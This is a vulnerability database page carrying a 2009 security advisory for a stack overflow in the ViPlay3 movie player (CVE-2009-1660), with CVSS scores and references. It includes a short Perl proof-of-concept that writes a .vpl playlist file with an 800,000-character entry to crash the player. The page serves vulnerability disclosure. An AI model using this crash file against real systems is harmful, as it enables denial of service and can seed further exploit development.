Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zeroscienceGjoko KrsticZSL-2009-4913
HistoryMay 08, 2009 - 12:00 a.m.

ViPlay3 <= 3.00 (.vpl) Local Stack Overflow PoC

2009-05-0800:00:00
Gjoko Krstic
zeroscience.mk
20

CVSS2

9.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:M/Au:N/C:C/I:C/A:C

AI Score

7.6

Confidence

Low

EPSS

0.126

Percentile

95.6%

JSON

Title: ViPlay3 <= 3.00 (.vpl) Local Stack Overflow PoC
Advisory ID: ZSL-2009-4913
Type: Local
Impact: System Access, DoS
Risk: (3/5)
Release Date: 08.05.2009

Summary

ViPlay3 is a freeware movie player designed to play the most popular movie types using overlaying technology for a faster and more efficient way of video playback.

Description

URUWorks ViPlay3 is prone to a remote buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied input (.vpl file). Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.

Vendor

URUWorks - <http://www.urusoft.net>

Affected Version

3.00

Tested On

Microsoft Windows XP Professional SP3 (English)

Vendor Status

N/A

PoC

viplay_poc.pl

Credits

Vulnerability discovered by Gjoko Krstic - <[email protected]>

References

[1] <http://packetstormsecurity.org/filedesc/viplay-overflow.txt.html&gt;
[2] http://www.securityfocus.com/bid/34877
[3] <http://www.milw0rm.com/exploits/8644&gt;
[4] <http://securityreason.com/exploitalert/6188&gt;
[5] <https://vulners.com/cve/CVE-2009-1660&gt;
[6] <https://nvd.nist.gov/vuln/detail/CVE-2009-1660&gt;
[7] <https://exchange.xforce.ibmcloud.com/vulnerabilities/50403&gt;

Changelog

[08.05.2009] - Initial release
[25.10.2021] - Added reference [5], [6] and [7]

Contact

Zero Science Lab

Web: <http://www.zeroscience.mk>
e-mail: [email protected]

<html><body><p>#!/usr/bin/perl
#
# ViPlay3 &lt;= 3.00 (.vpl) Local Stack Overflow PoC
#
# Product web page: http://www.urusoft.net/
# Tested on Microsoft Windows XP Professional SP3 (English)
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# liquidworm gmail com
# http://www.zeroscience.org/
# 08.05.2009

$b= "[General]\r\n".
    "Title=Proof of Concept\r\n".
    "Author=LiquidWorm\r\n".
    "Comments=2009\r\n".
    "Version=1.0\r\n".
    "[Files]\r\n";
    "Count=800000\r\n".
    "LastPlayed=0\r\n";
$c= "1=" . "A" x 800000 . "\r\n";
open a, "&gt;./lqwrm.vpl";
print a $b.$c;
close a;
print "\n- Done!\n";</p></body></html>

Related

openvas 2
prion 1
cvelist 1
exploitdb 1
cve 1
nvd 1
openvas
openvas
ViPlay .vpl File Stack Overflow Vulnerability
2009-05-26 00:00:00
ViPlay .vpl File Stack Overflow Vulnerability
2009-05-26 00:00:00
prion
prion
Stack overflow
2009-05-18 12:00:00
cvelist
cvelist
CVE-2009-1660
2009-05-17 16:00:00
exploitdb
exploitdb
ViPlay3 &lt; 3.00 - &#039;.vpl&#039; Local Stack Overflow (PoC)
2009-05-08 00:00:00
cve
cve
CVE-2009-1660
2009-05-18 12:00:01
nvd
nvd
CVE-2009-1660
2009-05-18 12:00:01

CVSS2

9.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:M/Au:N/C:C/I:C/A:C

AI Score

7.6

Confidence

Low

EPSS

0.126

Percentile

95.6%

JSON
Related for ZSL-2009-4913
openvas2prion1cvelist1exploitdb1cve1nvd1